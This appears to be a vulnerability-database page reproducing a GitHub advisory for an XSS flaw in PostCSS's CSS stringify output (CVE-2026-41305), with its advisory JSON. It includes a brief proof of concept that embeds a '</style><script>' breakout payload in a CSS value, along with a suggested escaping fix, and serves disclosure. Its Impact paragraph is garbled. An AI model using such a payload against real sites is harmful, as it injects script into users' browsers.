GHSA-QX2V-QP2M-JG93

Vulnerability from github – Published: 2026-04-24 15:31 – Updated: 2026-04-24 15:31
VLAI
Summary
PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
Details

PostCSS: XSS via Unescaped </style> in CSS Stringify Output

Summary

PostCSS v8.5.5 (latest) does not escape </style> sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML <style> tags, </style> in CSS values breaks out of the style context, enabling XSS.

Proof of Concept

const postcss = require('postcss');

// Parse user CSS and re-stringify for page embedding
const userCSS = 'body { content: "</style><script>alert(1)</script><style>"; }';
const ast = postcss.parse(userCSS);
const output = ast.toResult().css;
const html = `<style>${output}</style>`;

console.log(html);
// <style>body { content: "</style><script>alert(1)</script><style>"; }</style>
//
// Browser: </style> closes the style tag, <script> executes

Tested output (Node.js v22, postcss v8.5.5):

Input: body { content: "</style><script>alert(1)</script><style>"; }
Output: body { content: "</style><script>alert(1)</script><style>"; }
Contains </style>: true

Impact

Impact non-bundler use cases since bundlers for XSS on their own. Requires some PostCSS plugin to have malware code, which can inject XSS to website.

Suggested Fix

Escape `

Severity
6.1 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "postcss"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "8.5.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-41305"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-24T15:31:42Z",
    "nvd_published_at": "2026-04-24T03:16:11Z",
    "severity": "MODERATE"
  },
  "details": "# PostCSS: XSS via Unescaped `\u003c/style\u003e` in CSS Stringify Output\n\n## Summary\n\nPostCSS v8.5.5 (latest) does not escape `\u003c/style\u003e` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `\u003cstyle\u003e` tags, `\u003c/style\u003e` in CSS values breaks out of the style context, enabling XSS.\n\n## Proof of Concept\n\n```javascript\nconst postcss = require(\u0027postcss\u0027);\n\n// Parse user CSS and re-stringify for page embedding\nconst userCSS = \u0027body { content: \"\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cstyle\u003e\"; }\u0027;\nconst ast = postcss.parse(userCSS);\nconst output = ast.toResult().css;\nconst html = `\u003cstyle\u003e${output}\u003c/style\u003e`;\n\nconsole.log(html);\n// \u003cstyle\u003ebody { content: \"\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cstyle\u003e\"; }\u003c/style\u003e\n//\n// Browser: \u003c/style\u003e closes the style tag, \u003cscript\u003e executes\n```\n\n**Tested output** (Node.js v22, postcss v8.5.5):\n```\nInput: body { content: \"\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cstyle\u003e\"; }\nOutput: body { content: \"\u003c/style\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u003cstyle\u003e\"; }\nContains \u003c/style\u003e: true\n```\n\n## Impact\n\nImpact non-bundler use cases since bundlers for XSS on their own. Requires some PostCSS plugin to have malware code, which can inject XSS to website.\n\n## Suggested Fix\n\nEscape `\u003c/style` in all stringified output values:\n```javascript\noutput = output.replace(/\u003c\\/(style)/gi, \u0027\u003c\\\\/$1\u0027);\n```\n\n## Credits\nDiscovered and reported by [Sunil Kumar](https://tharvid.in) ([@TharVid](https://github.com/TharVid))",
  "id": "GHSA-qx2v-qp2m-jg93",
  "modified": "2026-04-24T15:31:42Z",
  "published": "2026-04-24T15:31:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41305"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/postcss/postcss"
    },
    {
      "type": "WEB",
      "url": "https://github.com/postcss/postcss/releases/tag/8.5.10"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "PostCSS has XSS via Unescaped \u003c/style\u003e in its CSS Stringify Output"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.